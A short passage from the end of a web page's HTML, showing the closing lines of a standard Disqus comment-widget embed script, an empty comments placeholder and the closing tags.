            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
